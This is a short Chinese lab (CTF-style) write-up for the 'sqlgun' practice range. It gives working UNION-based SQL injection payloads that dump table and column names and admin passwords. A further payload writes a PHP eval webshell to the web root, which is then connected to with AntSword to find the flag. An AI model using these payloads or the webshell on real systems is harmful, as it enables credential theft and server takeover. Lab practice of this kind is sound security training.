当前位置: 首页 > article >正文

sqlgun靶场训练

article 2024/9/20 19:37:31

1.看到php?id=  ,然后刚好有个框,直接测试sql注入

2.发现输入1' union select 1,2,3#的时候在2处有回显

3.查看表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

4.查看列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

5.查看admin的密码

-1' union select 1,group_concat(id,admin,password),3 from admin #

6.目录扫描发现有一个phpinfo.php,访问绝对路径

6.构造一句话木马语句

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/q.php' #

7.蚁剑连接

8.根目录找到flag


http://www.kler.cn/news/309764.html

相关文章:

  • 【机器学习】--- 自然语言推理(NLI)
  • SPI软件模拟读写W25Q64
  • Qt常用控件——QLCDNumber
  • scantf
  • Linux--守护进程与会话
  • Java 中 List 常用类和数据结构详解及案例示范
  • 基于python+django+vue的外卖管理系统
  • java循环遍历树状结构对象并转换成另外树状结构对象
  • 6.安卓逆向-安卓开发基础adb工具
  • 学习贵在善假于物
  • 什么是科技与艺术相结合的异形创意圆形(饼/盘)LED显示屏
  • YooAsset基础操作及热更
  • 自监督的主要学习方法
  • Web植物管理系统-下位机部分
  • Facebook主页,广告账户,BM被封分别怎么解决?
  • sicp每日一题[2.17]
  • Ubuntu上如何使用sh文件更新CMake
  • 【二十一】【QT开发应用】ListWiddget图标模式
  • yolo自动化项目实例解析(二)ui页面整理
  • 组件上的v-model(数据传递),props验证,自定义事件,计算属性
  • 家电制造的隐形守护者:矫平机确保材料完美无瑕
  • Linux 调用write()函数后,内核一般多久将数据写入磁盘
  • Java轻量级测试框架的实现与使用 总篇
  • 【资料分析】刷题日记1
  • 保护您的企业免受网络犯罪分子侵害的四个技巧
  • 【运维监控】Prometheus+grafana监控flink运行情况
  • SpringBoot2:web开发常用功能实现及原理解析-@ControllerAdvice实现全局异常统一处理
  • [苍穹外卖]-10WebSocket入门与实战
  • SpringBoot整合WebSocket实现消息推送或聊天功能示例
  • 从头开始学MyBatis—02基于xml和注解分别实现的增删改查